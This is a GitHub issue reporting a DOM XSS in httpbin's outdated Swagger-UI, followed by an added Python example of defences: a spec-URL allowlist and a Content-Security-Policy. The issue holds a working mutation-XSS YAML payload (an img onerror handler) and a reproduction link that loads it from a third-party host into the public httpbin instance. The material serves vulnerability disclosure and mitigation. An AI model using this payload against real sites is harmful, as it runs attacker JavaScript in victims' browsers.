postmanlabs / httpbin

HTTP Request & Response Service, written in Python + Flask.
https://httpbin.org
ISC License

DOM XSS due to old SwaggerUI version #681

Open chilikeys opened 2 years ago

chilikeys commented 2 years ago

Hello,

httpbin uses an old version of Swagger-UI under the hood which is vulnerable to DOM XSS by adding a malicious YAML file as the value of the query parameter `url`.

Steps To Reproduce:

  1. Host a malicious .yaml file with the payload inside:
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  2. Visit the link https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml. Here I use the publicly available PoC posted in the reference article and the public instance of httpbin for ease. You can test it on another instance you spin up and use a payload you host if you prefer.
  3. Observe the pop-up window.

Supporting Material/References:

This is a bug in older SwaggerUI versions that use an older version of DOMPurify to sanitize HTML. You can read more about it here: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

Impact

Run JavaScript in the victim's browser.

Mitigation

Upgrade Swagger-UI version to the latest which mitigates this.

A few notes

I sent you an email regarding this and got no reply, so I am opening an issue here. Since there is another XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general.

However, I decided to report this for 2 reasons:

  1. It was already fixed by Swagger-UI and using the latest versions of dependencies is Security 101
  2. I am a bug bounty hunter on hackerone.com. Most programs accept 0-day reports no earlier than after 30 days of publication. I've come across some instances of this and I want to report them and since I believe this is a 0-day I wanted to make it public for this reason.

Best Regards,

rhinestonecowboy
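The report's vector is a spec URL that the page visitor controls through the `url` query parameter, and the payload executes through an inline `onerror` handler once the old DOMPurify lets the markup through. Upgrading Swagger-UI is the fix; the following is an added example (not code from the issue, from httpbin, or from Swagger-UI) of two defence-in-depth checks a deployment can put in front of the UI in the meantime: an allowlist on the spec URL, and a Content-Security-Policy that forbids inline script so an injected handler cannot run even if it reaches the DOM. The allowlisted hosts and the CSP directives are assumptions chosen for the example; a real deployment must also move the UI's inline initialisation script into a file, or the `script-src 'self'` policy will block it.

```python
"""Defender-side checks for a Swagger-UI style ``url`` query parameter.

Added example, not httpbin's or Swagger-UI's own code. Host names and
policy values are constructed assumptions for the demonstration.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the only hosts this deployment will fetch a spec from.
ALLOWED_SPEC_HOSTS = frozenset({"httpbin.org", "localhost"})


def is_allowed_spec_url(url: str, allowed_hosts=ALLOWED_SPEC_HOSTS) -> bool:
    """Return True only for an https URL whose host is exactly on the allowlist.

    Deliberately rejects the shapes that slip past a naive substring check:
    other schemes (http:, javascript:), userinfo (``https://httpbin.org@evil``),
    scheme-relative URLs (``//evil``), and hosts that merely end in an allowed
    name (``evil-httpbin.org``).
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme.lower() != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname  # already lower-cased by urlsplit, None if absent
    if not host:
        return False
    return host in allowed_hosts


def spec_url_from_request(request_url: str):
    """Extract the ``url`` query parameter the UI would load, or None."""
    query = parse_qs(urlsplit(request_url).query)
    values = query.get("url")
    return values[0] if values else None


def csp_header() -> str:
    """A Content-Security-Policy that blocks inline event handlers.

    Without 'unsafe-inline' in script-src, browsers refuse to execute
    inline handlers such as the report's ``onerror='alert(...)'`` and inline
    <script> blocks, so the UI's JavaScript must be served from files on the
    same origin ('self'). Inline styles stay allowed here because the stock
    UI relies on them (assumption for this example).
    """
    return "; ".join([
        "default-src 'self'",
        "script-src 'self'",
        "style-src 'self' 'unsafe-inline'",
        "img-src 'self' data:",
        "object-src 'none'",
        "base-uri 'self'",
        "frame-ancestors 'none'",
    ])


def guard_spec_request(request_url: str) -> dict:
    """Decide whether a request's ``url`` parameter may be honoured.

    Returns the extracted spec URL, the allow/deny decision, and the CSP
    header the response should carry regardless of the decision.
    """
    spec_url = spec_url_from_request(request_url)
    allowed = spec_url is not None and is_allowed_spec_url(spec_url)
    return {"spec_url": spec_url, "allowed": allowed, "csp": csp_header()}


if __name__ == "__main__":
    # The PoC link from the report: the spec lives on a third-party host.
    for req in (
        "https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml",
        "https://httpbin.org?url=https://httpbin.org/spec.json",
        "https://httpbin.org?url=https://httpbin.org@evil.example/spec.yaml",
    ):
        decision = guard_spec_request(req)
        print(f"{decision['spec_url']!r:60} allowed={decision['allowed']}")
```

Wire `guard_spec_request` into the handler that serves the UI page: deny (or ignore) the parameter when `allowed` is False, and set the `csp` value as the `Content-Security-Policy` response header on every response. Neither check replaces the dependency upgrade; they limit what an XSS in the bundle can do until it lands.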